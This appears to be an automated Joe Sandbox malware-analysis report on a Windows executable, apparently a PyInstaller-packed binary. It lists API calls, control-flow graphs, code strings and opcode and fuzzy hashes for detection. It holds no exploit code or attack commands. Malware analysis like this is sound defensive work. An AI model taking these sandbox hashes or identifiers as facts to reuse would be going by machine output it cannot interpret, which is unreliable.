                                                                                                                                                                                                                                                        • Instruction ID: 9a62833b4a29604724abb5bfac144f7bf6ceadc91254d599189c1ecbeea746a9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30a135f328e13ea8cfa75db9435735ae70663f86d9eb3de89f3f5a6e45aa4292
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54511272A0AA8285EA609B25A4503BA6691FF8C794F444231EF4DC7BE6FF3CE541D700

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6ABA60316,?,?,-00000018,00007FF6ABA5BC5B,?,?,?,00007FF6ABA5BB52,?,?,?,00007FF6ABA56EFE), ref: 00007FF6ABA600F8
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF6ABA60316,?,?,-00000018,00007FF6ABA5BC5B,?,?,?,00007FF6ABA5BB52,?,?,?,00007FF6ABA56EFE), ref: 00007FF6ABA60104
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                        • Opcode ID: d956f0b8ec152b18ca11aa0aed68125bebf2684d60339ba7369f52f17a1fcfe1
                                                                                                                                                                                                                                                        • Instruction ID: 3119eca4d2b70685eb63c9ea4f64a3ed870cf4c5d8f30c91ef9ee8e192b8671d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d956f0b8ec152b18ca11aa0aed68125bebf2684d60339ba7369f52f17a1fcfe1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0141C5A1F1BA4261EA25CB1AA8706752291FF4DB90F064135DF0DD77A8FE7DE4858304

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF6ABA42BC5), ref: 00007FF6ABA42AA1
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6ABA42BC5), ref: 00007FF6ABA42AAB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA42310: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6ABA42AC6,?,00007FF6ABA42BC5), ref: 00007FF6ABA42360
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA42310: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6ABA42AC6,?,00007FF6ABA42BC5), ref: 00007FF6ABA4241A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentErrorFileFormatLastMessageModuleNameProcess
                                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                        • API String ID: 4002088556-2863816727
                                                                                                                                                                                                                                                        • Opcode ID: 093d1e49c6a3f32bbd7db28c580ca23961d52f0e240546522d41da137270d6a4
                                                                                                                                                                                                                                                        • Instruction ID: d89437a768d7457747843ad2740a0e1d72af9f229b337e637b4baf400d6cb17c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 093d1e49c6a3f32bbd7db28c580ca23961d52f0e240546522d41da137270d6a4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6221A461F2E64291FA20AB24E8113BA6251FF5C784F804236EB5EC65F5FF6CE505C704

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 927 7ff6aba5c95c-7ff6aba5c982 928 7ff6aba5c99d-7ff6aba5c9a1 927->928 929 7ff6aba5c984-7ff6aba5c998 call 7ff6aba55e28 call 7ff6aba55e48 927->929 931 7ff6aba5cd77-7ff6aba5cd83 call 7ff6aba55e28 call 7ff6aba55e48 928->931 932 7ff6aba5c9a7-7ff6aba5c9ae 928->932 947 7ff6aba5cd8e 929->947 949 7ff6aba5cd89 call 7ff6aba5b824 931->949 932->931 934 7ff6aba5c9b4-7ff6aba5c9e2 932->934 934->931 937 7ff6aba5c9e8-7ff6aba5c9ef 934->937 941 7ff6aba5ca08-7ff6aba5ca0b 937->941 942 7ff6aba5c9f1-7ff6aba5ca03 call 7ff6aba55e28 call 7ff6aba55e48 937->942 945 7ff6aba5cd73-7ff6aba5cd75 941->945 946 7ff6aba5ca11-7ff6aba5ca17 941->946 942->949 950 7ff6aba5cd91-7ff6aba5cda8 945->950 946->945 951 7ff6aba5ca1d-7ff6aba5ca20 946->951 947->950 949->947 951->942 954 7ff6aba5ca22-7ff6aba5ca47 951->954 956 7ff6aba5ca7a-7ff6aba5ca81 954->956 957 7ff6aba5ca49-7ff6aba5ca4b 954->957 958 7ff6aba5ca56-7ff6aba5ca6d call 7ff6aba55e28 call 7ff6aba55e48 call 7ff6aba5b824 956->958 959 7ff6aba5ca83-7ff6aba5caab call 7ff6aba5e6c4 call 7ff6aba5b464 * 2 956->959 960 7ff6aba5ca4d-7ff6aba5ca54 957->960 961 7ff6aba5ca72-7ff6aba5ca78 957->961 988 7ff6aba5cc00 958->988 990 7ff6aba5caad-7ff6aba5cac3 call 7ff6aba55e48 call 7ff6aba55e28 959->990 991 7ff6aba5cac8-7ff6aba5caf3 call 7ff6aba5d184 959->991 960->958 960->961 962 7ff6aba5caf8-7ff6aba5cb0f 961->962 965 7ff6aba5cb8a-7ff6aba5cb94 call 7ff6aba64b8c 962->965 966 7ff6aba5cb11-7ff6aba5cb19 962->966 979 7ff6aba5cb9a-7ff6aba5cbaf 965->979 980 7ff6aba5cc1e 965->980 966->965 969 7ff6aba5cb1b-7ff6aba5cb1d 966->969 969->965 973 7ff6aba5cb1f-7ff6aba5cb35 969->973 973->965 977 7ff6aba5cb37-7ff6aba5cb43 973->977 977->965 984 7ff6aba5cb45-7ff6aba5cb47 977->984 979->980 982 7ff6aba5cbb1-7ff6aba5cbc3 GetConsoleMode 979->982 986 7ff6aba5cc23-7ff6aba5cc43 ReadFile 980->986 982->980 987 7ff6aba5cbc5-7ff6aba5cbcd 982->987 984->965 989 7ff6aba5cb49-7ff6aba5cb61 984->989 992 7ff6aba5cd3d-7ff6aba5cd46 GetLastError 986->992 993 7ff6aba5cc49-7ff6aba5cc51 986->993 987->986 995 7ff6aba5cbcf-7ff6aba5cbf1 ReadConsoleW 987->995 998 7ff6aba5cc03-7ff6aba5cc0d call 7ff6aba5b464 988->998 989->965 999 7ff6aba5cb63-7ff6aba5cb6f 989->999 990->988 991->962 996 7ff6aba5cd48-7ff6aba5cd5e call 7ff6aba55e48 call 7ff6aba55e28 992->996 997 7ff6aba5cd63-7ff6aba5cd66 992->997 993->992 1001 7ff6aba5cc57 993->1001 1003 7ff6aba5cbf3 GetLastError 995->1003 1004 7ff6aba5cc12-7ff6aba5cc1c 995->1004 996->988 1008 7ff6aba5cd6c-7ff6aba5cd6e 997->1008 1009 7ff6aba5cbf9-7ff6aba5cbfb call 7ff6aba55dbc 997->1009 998->950 999->965 1007 7ff6aba5cb71-7ff6aba5cb73 999->1007 1011 7ff6aba5cc5e-7ff6aba5cc73 1001->1011 1003->1009 1004->1011 1007->965 1016 7ff6aba5cb75-7ff6aba5cb85 1007->1016 1008->998 1009->988 1011->998 1012 7ff6aba5cc75-7ff6aba5cc80 1011->1012 1018 7ff6aba5cca7-7ff6aba5ccaf 1012->1018 1019 7ff6aba5cc82-7ff6aba5cc9b call 7ff6aba5c574 1012->1019 1016->965 1023 7ff6aba5cd2b-7ff6aba5cd38 call 7ff6aba5c3b4 1018->1023 1024 7ff6aba5ccb1-7ff6aba5ccc3 1018->1024 1027 7ff6aba5cca0-7ff6aba5cca2 1019->1027 1023->1027 1028 7ff6aba5ccc5 1024->1028 1029 7ff6aba5cd1e-7ff6aba5cd26 1024->1029 1027->998 1031 7ff6aba5ccca-7ff6aba5ccd1 1028->1031 1029->998 1032 7ff6aba5cd0d-7ff6aba5cd18 1031->1032 1033 7ff6aba5ccd3-7ff6aba5ccd7 1031->1033 1032->1029 1034 7ff6aba5ccd9-7ff6aba5cce0 1033->1034 1035 7ff6aba5ccf3 1033->1035 1034->1035 1036 7ff6aba5cce2-7ff6aba5cce6 1034->1036 1037 7ff6aba5ccf9-7ff6aba5cd09 1035->1037 1036->1035 1038 7ff6aba5cce8-7ff6aba5ccf1 1036->1038 1037->1031 1039 7ff6aba5cd0b 1037->1039 1038->1037 1039->1029
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: e215fe86d7b0e6e2d08488d11c6944312657e99f94033e5188670243fcaba875
                                                                                                                                                                                                                                                        • Instruction ID: 40750d42342ff36adedaaf1dd71452c035305665af47b3f000c726543472166d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e215fe86d7b0e6e2d08488d11c6944312657e99f94033e5188670243fcaba875
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0C1F57390EB8291E7618B1594402BD7B90FB89B80F550331DB4E837B9FE7DEA458708

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                                                        • Opcode ID: cf92fa18b9e00c3d9d6dbbac75613ba75212e4a615f40cb6368d246a710d7e34
                                                                                                                                                                                                                                                        • Instruction ID: f757c4cef08e305a143e64de34c61c55a7871531e526a566d8a493601769731f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf92fa18b9e00c3d9d6dbbac75613ba75212e4a615f40cb6368d246a710d7e34
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86214431A0DA8342EB509B59E45063AA3A1FF897E0F500235DBAD83AF5EF7CD4558740

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: GetCurrentProcess.KERNEL32 ref: 00007FF6ABA47BD0
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: OpenProcessToken.ADVAPI32 ref: 00007FF6ABA47BE3
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: GetTokenInformation.KERNELBASE ref: 00007FF6ABA47C08
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: GetLastError.KERNEL32 ref: 00007FF6ABA47C12
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: GetTokenInformation.KERNELBASE ref: 00007FF6ABA47C52
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6ABA47C6E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA47BB0: CloseHandle.KERNEL32 ref: 00007FF6ABA47C86
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00007FF6ABA43099), ref: 00007FF6ABA4864C
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00007FF6ABA48655
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                        • Opcode ID: d798866db3bd5df2efb7bc743f04e88858d4d647152387f2e8ebfd41b25b19db
                                                                                                                                                                                                                                                        • Instruction ID: fa9f89b1323e472cbb8f6b656a36b3686ae1680c08eea2db2a0f6d6fd6948b5d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d798866db3bd5df2efb7bc743f04e88858d4d647152387f2e8ebfd41b25b19db
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE216071A0AB8282F6509B10E9153FA6261FF9C780F944435EB4EC3BA6EF3DD545C740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(00000000,?,00007FF6ABA428EC,FFFFFFFF,00000000,00007FF6ABA4336A), ref: 00007FF6ABA47372
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                        • Opcode ID: 61b418e99efde3a0f519453cac267e08843ad3bf0b3a29706ebb583658b230ee
                                                                                                                                                                                                                                                        • Instruction ID: eb4ea1edcde52c8958edff6afe09796fec0a73b1f4b360639107e18c5ad1612e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61b418e99efde3a0f519453cac267e08843ad3bf0b3a29706ebb583658b230ee
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D731CA6171AAC555EA219B21E4507AA6354EF8CBE0F440631EFAD837E6FF3CD2058700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6ABA5DE4B), ref: 00007FF6ABA5DF7C
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6ABA5DE4B), ref: 00007FF6ABA5E007
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                                                        • Opcode ID: 25026d299ec132fa7e986de3a50f80dd4a1c565eb46710a002b358a032e27337
                                                                                                                                                                                                                                                        • Instruction ID: 47e89c517c049da5656b654216c6c5d1b3663f8d98a68d14fb383bba9765eef9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25026d299ec132fa7e986de3a50f80dd4a1c565eb46710a002b358a032e27337
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14910572F0A65295F7508F6594406BD3BA0FB18B88F144239DF4E97AA4EF3CE686C314
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                                                        • Opcode ID: 89e82a0bcb92f9a57c8ce538440e566bc748d838767a3902d6c6661200ebf515
                                                                                                                                                                                                                                                        • Instruction ID: c3aa351dd9a68aabadf599ce4943306ef24542d177fbbac1f2a09ad9f1bcbb63
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89e82a0bcb92f9a57c8ce538440e566bc748d838767a3902d6c6661200ebf515
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB51C5B2F061118AEB24DF68D9A56BC3765EB18358F504235DF1ED2AF5FF38A8818700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                                        • Opcode ID: 77215611d5833cc4261aa3ce6efef3cbe316a0555a56b2abfd6bea145bf69a9d
                                                                                                                                                                                                                                                        • Instruction ID: 92ab1445cc1ad95998a892cab821909a9ce4d8243ecfacbd38066b70e91a3d82
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77215611d5833cc4261aa3ce6efef3cbe316a0555a56b2abfd6bea145bf69a9d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00518D22E0A6418AFB10DF79D4503BD23A1EF5CB88F148639DF0D876A9EF38D6918744
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                                        • Opcode ID: 6ce4c88b6d2478032947ca8abe21e63121e2028da5231a2800b2a2486ebac064
                                                                                                                                                                                                                                                        • Instruction ID: 93b3c6d833f1039c2d056a23ffeab8399a5374af17cbea21bc1395991f243782
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ce4c88b6d2478032947ca8abe21e63121e2028da5231a2800b2a2486ebac064
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA41A172E1978283F7548F2495103A97360FB993A4F109335EB9C43AE6EF7CA2E08704
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                        • String ID:
